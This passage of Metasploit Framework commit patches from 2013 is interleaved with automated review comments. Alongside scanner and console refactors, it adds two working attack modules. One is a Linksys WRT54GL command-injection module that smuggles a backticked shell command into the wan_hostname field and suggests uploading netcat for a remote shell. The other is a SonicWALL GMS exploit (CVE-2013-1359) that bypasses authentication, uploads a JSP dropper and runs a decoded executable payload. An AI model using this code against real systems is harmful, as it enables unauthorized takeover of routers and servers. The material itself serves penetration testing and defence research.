'GET', }, 5) return if not res or not res.body or not res.code 
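Review bot: `check_app` now builds the request path from the raw option, `'uri' => "#{datastore['PATH']}" << app`, instead of the `tpath` argument, which drops the trailing-slash normalisation that run_host applies before calling it. When PATH is set without a trailing slash the base path and the page name are joined with no separator, so every request misses and the checks come back negative. Keeping `'uri' => tpath + app` preserves the normalisation and leaves the parameter in use. The same substitution appears in the scan_pages and plugin_search hunks.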
@@ -201,13 +203,14 @@ def scan_pages(tpath,iapp, ip) print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def plugin_search(tpath,papp, ip, bres) + + def plugin_search (tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => tpath+papp, + 'uri' => "#{datastore['PATH']}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -217,30 +220,32 @@ def plugin_search(tpath,papp, ip, bres) if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) print_good("Found Plugin: #{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("\tPasswd not found") + print_error("Passwd not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("\tPasswd file found in response") + print_good("Passwd file found in response") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("\tUnable to identify SQL injection") + print_error("Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("\tNo XSS") + print_error("No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("\tPossible XSS") + print_good("Possible XSS") elsif(res.body =~/SQL syntax/ ) - print_error("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/com_/) - blah = papp.split('_') - blah1 = blah[1].gsub('/','') + vars = papp.split('_') + pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => tpath+"index.php?option=com_#{blah1}", + 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) if (res1.code.to_i == 200) - print_status("\tFound_page: index.php?option=com_#{blah1}") - end + print_good("Found Page: index.php?option=com_#{pages}") + else + print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end + end report_note( :host => ip, :port => datastore['RPORT'], 
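Review bot: `res1` is dereferenced without a nil check, both in `if (res1.code.to_i == 200)` and in the new `else` branch that prints `res1.code.to_s`. `send_request_cgi` returns nil on a timeout, which is what the guard on `res` at the top of this method already allows for, and the rescue list at the bottom does not cover NoMethodError. Use `if res1 and res1.code.to_i == 200` and turn the new branch into `elsif res1`. plugin_search starts outside this hunk.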
@@ -257,12 +262,12 @@ def plugin_search(tpath,papp, ip, bres) print_status("#{ip} requires a SSL client certificate") else print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") - end end + end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end From cfeccaa4f8046643db656256aaae9812cf02078c Mon Sep 17 00:00:00 2001 From: Stephen Haywood Date: Sun, 20 Jan 2013 23:26:53 -0500 Subject: [PATCH 084/421] Noted support for importing XML reports. --- plugins/openvas.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/openvas.rb b/plugins/openvas.rb index 247a0b7a7d76..34d814055231 100644 --- a/plugins/openvas.rb +++ b/plugins/openvas.rb @@ -530,7 +530,7 @@ def cmd_openvas_report_import(*args) end else print_status("Usage: openvas_report_import ") - print_status("Only the NBE format is supported for importing.") + print_status("Only the NBE and XML formats are supported for importing.") end end From 8b70a94b34a40da4056c65444893ea86a82335ce Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 21 Jan 2013 00:30:43 -0600 Subject: [PATCH 085/421] Updates the progress function Because the previous one was wrong. --- modules/post/multi/manage/record_mic.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index 73519ea006e4..31a1c34e1810 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb 
@@ -37,10 +37,16 @@ def rhost end def progress - timeout = (datastore['DURATION'] < 1) ? 1 : (datastore['DURATION']*0.1) - datastore['DURATION'].times do |i| - print_status("Recording: #{(Float(i+1)/datastore['DURATION'] * 100).round}% done...") - select(nil, nil, nil, timeout) + duration = datastore['DURATION'] + m = duration / 10 + m = 1 if m == 0 + + duration.times do |i| + if i % m == 0 + p = ((Float((i == 0) ? 1 : i+1) / duration) * 100).round + print_status("#{rhost} - #{p.to_s}%...") + end + select(nil, nil, nil, 1) end end From f05e3580589444abcb6ce7256518d5c30894019c Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Mon, 21 Jan 2013 00:46:05 -0600 Subject: [PATCH 086/421] replace unless rhosts.include? with rhosts.uniq! seems like this will speed up the process due to far less Array lookups --- lib/msf/ui/console/command_dispatcher/db.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index c5904248291e..853722721370 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -283,8 +283,9 @@ def cmd_hosts(*args) if set_rhosts # only unique addresses addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! end end return @@ -323,8 +324,9 @@ def cmd_hosts(*args) tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! if mode == :delete host.destroy delete_count += 1 @@ -347,6 +349,8 @@ def cmd_hosts(*args) set_rhosts_from_addrs(rhosts) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } +## +## end def cmd_services_help 
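Review bot: In `progress` the expression `(i == 0) ? 1 : i+1` always equals `i+1`, so the ternary adds nothing, and the local `p` shadows Kernel#p inside the block. `pct = ((i + 1) * 100.0 / duration).round` followed by `print_status("#{rhost} - #{pct}%...")` expresses the same calculation. Because a line is printed only when `i % m == 0`, the last message normally stays below 100% (91% for a duration of 100), so a final status line after the loop would be clearer.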
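Review bot: `rhosts.uniq!` sits after the `if set_rhosts` block but, as far as the hunk shows, still inside the per-host loop, so the whole array is de-duplicated on every iteration, including when `set_rhosts` is false. That is at least as much work as the `include?` test it replaces, so the speed-up described in the commit message is unlikely to materialise. Calling it once where the list is consumed, `set_rhosts_from_addrs(rhosts.uniq) if set_rhosts`, gives the intended saving. The same placement is repeated in the second cmd_hosts hunk and in the cmd_services, cmd_creds and cmd_notes hunks.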
@@ -508,8 +512,9 @@ def cmd_services(*args) tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! if (mode == :delete) service.destroy @@ -828,8 +833,9 @@ def cmd_creds(*args) end if set_rhosts addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! creds_returned += 1 end @@ -954,8 +960,9 @@ def cmd_notes(*args) msg << " host=#{note.host.address}" if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end + rhosts.uniq! end if (note.service) name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}") From b2c722310893aa1a9a858a42fafde51dc9548f98 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 21 Jan 2013 12:26:35 +0100 Subject: [PATCH 087/421] Cleanup for mysql_file_enum.rb --- lib/msf/core/exploit/mysql.rb | 7 --- .../scanner/mysql/mysql_file_enum.rb | 62 ++++++++++++++----- 2 files changed, 45 insertions(+), 24 deletions(-) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 86ed7e856a06..b86e51e9a955 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -87,13 +87,6 @@ def mysql_login_datastore return res end - # This function does not handle any errors, if you use this - # make sure you handle the errors yourself - def mysql_query_no_handle(sql) - res = @mysql_handle.query(sql) - res - end - def mysql_query(sql) begin res = @mysql_handle.query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index d7b30b5da6fb..09374fc9d1dc 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb 
+++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -18,27 +18,39 @@ def initialize super( 'Name' => 'MYSQL File/Directory Enumerator', 'Description' => %Q{ - Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. + Enumerate files and directories using the MySQL load_file feature, for more + information see the URL in the references. }, 'Author' => [ 'Robin Wood ' ], 'References' => [ - [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], - [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] - ], + [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], + [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] + ], 'License' => MSF_LICENSE ) register_options([ OptPath.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), - OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), + OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'mysql' ]), OptString.new('TABLE_NAME', [ true, "Name of table to use - Warning, if the table already exists its contents will be corrupted", Rex::Text.rand_text_alpha(8) ]), OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) - ]) + ]) end + # This function does not handle any errors, if you use this + # make sure you handle the errors yourself + def mysql_query_no_handle(sql) + res = @mysql_handle.query(sql) + res + end + + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) - print_status("Checking " + ip) + vprint_status("#{peer} - Login...") if (not mysql_login_datastore) return 
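Review bot: The default for `DATABASE_NAME` changes from `test` to `mysql`, so with default options run_host creates, loads into and drops its scratch table inside the server's system schema. The hunk gives no reason for the change, and a leftover or clobbered table there is harder to notice and to undo than one in a user schema. If the new default is kept, the option text should say what is written, for example `"Name of database to use (a temporary table is created in it)"`. run_host continues outside the hunk.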
@@ -47,10 +59,10 @@ def run_host(ip) begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - print_error("MySQL Error: #{e.class} #{e.to_s}") + vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - print_error("Timeout: #{e.message}") + vprint_error("#{peer} - Timeout: #{e.message}") return end @@ -58,7 +70,7 @@ def run_host(ip) table_exists = (res.size == 1) if !table_exists - print_status("Table doesn't exist so creating it") + vprint_status("#{peer} - Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -66,9 +78,10 @@ def run_host(ip) file.each_line do |line| check_dir(line.chomp) end + file.close if !table_exists - print_status("Cleaning up the temp table") + vprint_status("#{peer} - Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end 
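Review bot: The added `file.close` is skipped whenever something inside the loop raises, and so is the `DROP TABLE` cleanup that follows it. The block form closes the handle on every path: `File.open(datastore['FILE_LIST'], "r") { |f| f.each_line { |line| check_dir(line.chomp) } }`. Moving the drop into an `ensure` clause would likewise stop an interrupted run from leaving the scratch table on the server. run_host starts outside this hunk.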
@@ -77,19 +90,34 @@ def check_dir dir begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good(dir + " is a directory and exists") + print_good("#{peer} - #{dir} is a directory and exists") + report_note( + :host => rhost, + :type => "filesystem.dir", + :data => "#{dir} is a directory and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) rescue ::RbMysql::ServerError - print_warning(dir + " does not exist") + vprint_warning("#{peer} - #{dir} does not exist") rescue ::RbMysql::Error => e - print_error("MySQL Error: #{e.class} #{e.to_s}") + vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - print_error("Timeout: #{e.message}") + vprint_error("#{peer} - Timeout: #{e.message}") return else - print_good(dir + " is a file and exists") + print_good("#{peer} - #{dir} is a file and exists") + report_note( + :host => rhost, + :type => "filesystem.file", + :data => "#{dir} is a file and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) end - #puts res.inspect return end From 62ff52280a478026b0d832a69c39cbcfc38f65f1 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 21 Jan 2013 13:19:29 +0100 Subject: [PATCH 088/421] initial linksys OS command injection --- .../admin/http/linksys_wrt54gl_exec.rb | 144 ++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb new file mode 100644 index 000000000000..e9f525b7ec80 --- /dev/null +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb 
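Review bot: `rescue ::RbMysql::ServerError` treats every remaining server-side error as "does not exist", which presumably also covers a missing FILE privilege or a malformed statement, so a negative result cannot be told apart from a check that never ran. Binding the exception with `=> e` and printing `vprint_warning("#{peer} - #{dir} not confirmed (#{e.class})")` makes the difference visible. The `res` assignment and the trailing bare `return` are unused and can be dropped.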
@@ -0,0 +1,144 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linksys WRT54GL Remote Command Execution', + 'Description' => %q{ + Some Linksys Routers are vulnerable to OS Command injection. + You will need credentials to the webinterface to access the vulnerable part + of the application. + Default credentials are always a good starting point. admin/admin or admin + and blank password could be a first try. + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your + local system for a first test. + + Hint: To get a remote shell you could upload a netcat binary and exec it. + WARNING: Backup your network and dhcp configuration. We will overwrite it! 
+ Have phun + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'EDB', '24202' ], + [ 'BID', '57459' ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 18 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USER',[ true, 'User to login with', 'admin']), + OptString.new('PASS',[ true, 'Password to login with', 'password']), + OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), + OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), + OptString.new('LANIP', [ false, 'LAN IP address of the router', '']), + OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), + OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), + ], self.class) + end + + def run + #setting up the needed variables + uri = datastore['VULNPATH'] + user = datastore['USER'] + rhost = datastore['RHOST'] + netmask = datastore['NETMASK'] + routername = datastore['ROUTER_NAME'] + wandomain = datastore['WAN_DOMAIN'] + wanmtu = datastore['WAN_MTU'] + + # using the RHOST for the correct lan IP settings + # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! 
+ if datastore['LANIP'] =~ // + ip = datastore['LANIP'].split('.') + else + ip = rhost.split('.') + end + + # not sure if this is a good way for blank passwords: + if datastore['PASS'] == "" + pass = "" + else + pass = datastore['PASS'] + end + + print_status("Trying to login with #{user} / #{pass}") + + user_pass = Rex::Text.encode_base64(user + ":" + pass) + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } + }, 25) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + + print_status("Sending remote command: " + datastore['CMD']) + + cmd = Rex::Text.uri_encode(datastore['CMD']) + #cmd = datastore['CMD'] + + data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + + if datastore['VERBOSE'] == true + print_line("using the following target URL: \n#{uri}") + end + + begin + res = send_request_cgi( + { + 'uri' => uri, + 
'method' => 'POST', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + }, + 'data' => data_cmd, + }, 20) + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n") + print_status("Blind Exploitation - unknown Exploitation state\n") + end +end From 11c13500bed711f3d1e8e09aaa202e8799e3edb0 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 21 Jan 2013 13:41:42 +0100 Subject: [PATCH 089/421] small fix --- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index e9f525b7ec80..85d8c93afa3c 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -67,7 +67,7 @@ def run # using the RHOST for the correct lan IP settings # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! - if datastore['LANIP'] =~ // + if datastore['LANIP'] !~ // ip = datastore['LANIP'].split('.') else ip = rhost.split('.') From eb92070df8f7068edbe4759b7d69cf3966dc7ff1 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 22 Jan 2013 01:54:41 +0100 Subject: [PATCH 090/421] added module for CVE-2013-1359 --- .../multi/http/sonicwall_gms_upload.rb | 273 ++++++++++++++++++ 1 file changed, 273 insertions(+) create mode 100644 modules/exploits/multi/http/sonicwall_gms_upload.rb diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb new file mode 100644 index 000000000000..5e710b117d32 --- /dev/null +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb 
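Review bot: `target_url` is used in three `vprint_error` calls but is never defined in this file, so each of those error paths raises NameError instead of printing its message. The `unless (res.kind_of? Rex::Proto::Http::Response)` block also has no `return`, so a missing response falls through to `res.code` on nil. Use `vprint_error("#{rhost}:#{rport} not responding")` and add `return :abort` inside that block. The `if datastore['PASS'] == ""` branch assigns the same value either way and reduces to `pass = datastore['PASS']`.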
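Review bot: `datastore['LANIP'] !~ //` cannot be true for any string, because an empty pattern matches everything, so after this fix the `LANIP` option is ignored and the RHOST octets are always sent; before it, the empty default was always used. The request rewrites the device's LAN settings with these octets, so the test should be whether the option is set: `if datastore['LANIP'].to_s.empty?` selecting `ip = rhost.split('.')`, otherwise `ip = datastore['LANIP'].split('.')`. The enclosing `run` method starts and ends outside this hunk.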
@@ -0,0 +1,273 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SonicWALL GMS Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in SonicWALL GMS. It exploits two + vulnerabilities in order to get its objective. An authentication bypass in the + Web Administration interface allows to abuse the "appliance" application and upload + an arbitrary payload embedded in a JSP. The module has been tested successfully on + SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual + Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run + successfully while testing, shell payload have been used. 
+ }, + 'Author' => + [ + 'Nikolas Sotiriu', # Vulnerability Discovery + 'Julian Vilas ', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1359'], + [ 'OSVDB', '89347' ], + [ 'BID', '57445' ], + [ 'EDB', '24204' ] + ], + 'Privileged' => true, + 'Platform' => [ 'win', 'linux' ], + 'Targets' => + [ + [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 17 2012')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) + ], self.class) + end + + def generate_jsp + var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) + var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) + var_data = Rex::Text.rand_text_alpha(rand(8)+8) + var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_counter = Rex::Text.rand_text_alpha(rand(8)+8) + var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) + var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) + var_comb = Rex::Text.rand_text_alpha(rand(8)+8) + var_exe = Rex::Text.rand_text_alpha(rand(8)+8) + @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) + var_proc = Rex::Text.rand_text_alpha(rand(8)+8) + var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) + var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) + + jspraw = "<%@ page import=\"java.io.*\" %>\n" + jspraw << "<%\n" + jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" + jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" + jspraw << 
"String #{var_data} = \"\";\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" + jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" + jspraw << "}\n" + + jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" + jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" + + jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" + jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" + jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" + jspraw << "#{var_inputstream}.close();\n" + + jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" + jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" + jspraw << "{\n" + jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" + jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" + jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" + jspraw << "#{var_comb} <<= 4;\n" + jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" + jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" + jspraw << "}\n" + + jspraw << "#{var_outputstream}.write(#{var_bytes});\n" + jspraw << "#{var_outputstream}.close();\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" + jspraw << "String[] #{var_fperm} = new String[3];\n" + jspraw << "#{var_fperm}[0] = \"chmod\";\n" + jspraw << "#{var_fperm}[1] = \"+x\";\n" + jspraw << "#{var_fperm}[2] = #{var_exepath};\n" + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" + jspraw << "if (#{var_proc}.waitFor() == 0) {\n" + jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + # Linux and other UNICES allow removing files while they are in use... 
+ jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" + jspraw << "} else {\n" + # Windows does not .. + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + + jspraw << "%>\n" + return jspraw + end + + def get_install_path + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'connection' => 'TE, close', + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'vars_post' => { + 'num' => '123456', + 'action' => 'show_diagnostics', + 'task' => 'search', + 'item' => 'application_log', + 'criteria' => '*.*', + 'width' => '500' + } + }) + + if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ + return $1 + end + + return nil + end + + def upload_file(location, filename, contents) + post_data = Rex::MIME::Message.new + post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") + post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") + post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") + post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") + + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'connection' => 'TE, close' + }) + + if res and res.code == 200 and res.body.empty? + return true + else + return false + end + end + + def check + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + if get_install_path.nil? 
